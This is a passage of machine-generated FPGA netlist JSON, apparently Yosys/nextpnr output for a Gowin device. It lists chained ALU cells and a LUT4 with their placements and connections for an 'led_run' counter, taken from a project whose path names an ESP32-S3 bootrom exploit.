"c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7855 ], + "I3": [ 8057 ], + "I1": [ 7590 ], + "I0": [ 8057 ], + "COUT": [ 7851 ], + "CIN": [ 7854 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7852 ], + "I3": [ 8057 ], + "I1": [ 7585 ], + "I0": [ 8057 ], + "COUT": [ 7848 ], + "CIN": [ 7851 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7849 ], + "I3": [ 8057 ], + "I1": [ 7580 ], + "I0": [ 8057 ], + "COUT": [ 7845 ], + "CIN": [ 7848 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7846 ], + "I3": [ 8057 ], + "I1": [ 7575 ], + "I0": [ 8057 ], + "COUT": [ 7842 ], + "CIN": [ 7845 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7843 ], + "I3": [ 8057 ], + "I1": [ 7570 ], + "I0": [ 8057 ], + "COUT": [ 7839 ], + "CIN": [ 7842 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7840 ], + "I3": [ 8057 ], + "I1": [ 7564 ], + "I0": [ 8057 ], + "COUT": [ 7836 ], + "CIN": [ 7839 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7837 ], + "I3": [ 8057 ], + "I1": [ 7681 ], + "I0": [ 8057 ], + "COUT": [ 7833 ], + "CIN": [ 7836 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7834 ], + "I3": [ 8057 ], + "I1": [ 7674 ], + "I0": [ 8057 ], + "COUT": [ 7830 ], + "CIN": [ 7833 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y12/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7831 ], + "I3": [ 8057 ], + "I1": [ 7668 ], + "I0": [ 8057 ], + "COUT": [ 7827 ], + "CIN": [ 7830 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y12/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7828 ], + "I3": [ 8057 ], + "I1": [ 7663 ], + "I0": [ 8057 ], + "COUT": [ 7824 ], + "CIN": [ 7827 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y12/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7825 ], + "I3": [ 8057 ], + "I1": [ 7657 ], + "I0": [ 8057 ], + "COUT": [ 7821 ], + "CIN": [ 7824 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y12/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7822 ], + "I3": [ 8057 ], + "I1": [ 7651 ], + "I0": [ 8057 ], + "COUT": [ 7818 ], + "CIN": [ 7821 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y12/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7819 ], + "I3": [ 8057 ], + "I1": [ 7645 ], + "I0": [ 8057 ], + "COUT": [ 7815 ], + "CIN": [ 7818 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y12/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7816 ], + "I3": [ 8057 ], + "I1": [ 7618 ], + "I0": [ 8057 ], + "COUT": [ 7812 ], + "CIN": [ 7815 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y12/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7813 ], + "I3": [ 8057 ], + "I1": [ 7561 ], + "I0": [ 8057 ], + "COUT": [ 7809 ], + "CIN": [ 7812 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7810 ], + "I3": [ 8057 ], + "I1": [ 7558 ], + "I0": [ 8057 ], + "COUT": [ 8062 ], + "CIN": [ 7809 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_LUT4_I1": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1010100000001000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7741 ], + "I2": [ 7740 ], + "I1": [ 7739 ], + "I0": [ 7556 ], + "F": [ 7418 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y13/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7806 ], + "I3": [ 8057 ], + "I1": [ 7626 ], + "I0": [ 8057 ], + "COUT": [ 7803 ], + "CIN": [ 8063 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y13/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7804 ], + "I3": [ 8057 ], + "I1": [ 7621 ], + "I0": [ 8057 ], + "COUT": [ 7800 ], + "CIN": [ 7803 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y13/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7801 ], + "I3": [ 8057 ], + "I1": [ 7610 ], + "I0": [ 8057 ], + "COUT": [ 7797 ], + "CIN": [ 7800 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y13/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7798 ], + "I3": [ 8057 ], + "I1": [ 7605 ], + "I0": [ 8056 ], + "COUT": [ 7794 ], + "CIN": [ 7797 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y13/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7795 ], + "I3": [ 8057 ], + "I1": [ 7600 ], + "I0": [ 8057 ], + "COUT": [ 7791 ], + "CIN": [ 7794 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7792 ], + "I3": [ 8057 ], + "I1": [ 7595 ], + "I0": [ 8056 ], + "COUT": [ 7788 ], + "CIN": [ 7791 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7789 ], + "I3": [ 8057 ], + "I1": [ 7590 ], + "I0": [ 8057 ], + "COUT": [ 7785 ], + "CIN": [ 7788 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7786 ], + "I3": [ 8057 ], + "I1": [ 7585 ], + "I0": [ 8057 ], + 